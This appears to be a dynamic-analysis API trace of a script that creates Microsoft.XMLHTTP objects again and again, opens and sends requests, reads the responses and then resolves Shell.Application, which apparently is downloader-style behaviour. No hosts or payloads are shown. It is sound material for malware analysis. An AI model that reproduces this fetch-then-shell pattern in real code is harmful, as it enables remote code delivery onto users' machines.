	[0433.245] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0433.245] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0433.245] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0433.246] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0433.248] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0433.248] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0433.248] SysStringLen (param_1=0x0) returned 0x0
	[0433.248] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0433.249] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0433.249] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bd0) returned 0x0
	[0433.249] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0433.249] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0433.249] ??2@YAPEAX_K@Z () returned 0x62f330
	[0433.249] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0433.249] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0433.249] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0433.249] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bd0) returned 0x0
	[0433.249] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bd0) returned 0x3
	[0433.249] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0433.250] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bd0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0433.250] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0433.250] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0433.250] SysStringLen (param_1=0x0) returned 0x0
	[0433.250] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0433.250] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0433.250] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7550) returned 0x0
	[0433.250] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0433.250] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0433.250] ??2@YAPEAX_K@Z () returned 0x62f310
	[0433.250] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0433.250] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0433.250] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0433.250] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7550) returned 0x0
	[0433.250] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7550) returned 0x3
	[0433.250] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0433.251] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0433.251] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0433.251] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0433.251] SysStringLen (param_1=0x0) returned 0x0
	[0433.251] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0433.251] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0433.251] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0433.251] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0433.251] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0433.251] ??2@YAPEAX_K@Z () returned 0x62f330
	[0433.251] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0433.251] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0433.251] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0433.251] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0433.251] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0433.251] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0433.252] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0433.252] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0433.252] longjmp () 
	[0433.252] longjmp () 
	[0433.252] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0433.252] SysStringLen (param_1=0x0) returned 0x0
	[0433.252] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0433.252] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0433.252] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b80) returned 0x0
	[0433.252] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0433.252] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7c58) returned 0x0
	[0433.252] ??2@YAPEAX_K@Z () returned 0x62f310
	[0433.252] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7c58, pUnkSite=0x62f310) 
	[0433.252] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0433.252] XMLHTTPRequest:IUnknown:Release (This=0x49c7c58) returned 0x0
	[0433.252] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b80) returned 0x0
	[0433.252] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b80) returned 0x3
	[0433.252] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0433.253] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b80, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0433.253] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0433.253] longjmp () 
	[0433.253] longjmp () 
	[0433.253] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0433.253] SysStringLen (param_1=0x0) returned 0x0
	[0433.253] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0433.253] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0433.253] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0433.253] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0433.253] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7518) returned 0x0
	[0433.253] ??2@YAPEAX_K@Z () returned 0x62f330
	[0433.253] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7518, pUnkSite=0x62f330) 
	[0433.253] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0433.254] XMLHTTPRequest:IUnknown:Release (This=0x49c7518) returned 0x0
	[0433.254] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0433.254] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0433.254] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0433.254] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0433.254] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0433.254] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0433.254] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0433.254] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0433.559] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0433.559] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0433.559] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0433.559] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0433.559] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0433.559] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0433.559] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0433.559] SysStringLen (param_1=0x0) returned 0x0
